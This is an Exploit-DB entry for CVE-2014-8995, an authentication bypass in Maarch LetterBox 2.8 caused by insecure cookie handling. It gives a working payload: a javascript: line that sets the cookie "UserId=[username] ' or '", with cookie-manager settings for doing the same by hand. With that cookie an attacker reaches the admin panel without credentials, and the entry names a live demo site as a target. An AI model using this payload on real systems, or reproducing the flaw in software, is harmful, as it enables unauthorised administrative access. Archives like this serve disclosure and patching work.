Maarch LetterBox 2.8 - (Authentication Bypass) Insecure Cookies

Author: ZoRLu Bugrahan
type: webapps
platform: php
port: 
date_added: 2014-11-21  
date_updated: 2014-11-21  
verified: 0  
codes: OSVDB-114772;CVE-2014-8995  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comMaarchLetterBox2.8.zip  

raw file: 35271.txt  

# Title        : Maarch LetterBox 2.8 Insecure Cookie Handling Vulnerability (Login Bypass)
# Author       : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
# Home         : http://milw00rm.com / its online
# Date         : 17.11.2014
# Demo		   : http://www.era.sn/courrier
# Download 	   : http://downloads.sourceforge.net/project/maarchletterbox/MaarchLetterBox2.8.zip
# Thks         : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others

you first go here:

http://www.target.com/path/index.php?page=welcome.php

you will go login.php, but if we change our cookie's with this exploit we will be login admin panel.

exploit:

javascript:document.cookie = "UserId=[username] ' or '; path=/";

or you edit your cookie's with "Cookies Manager"

name     = maarch
contents = UserId=username ' or '
host     = your target
path     = /script_path/

and dont change other options its keep default.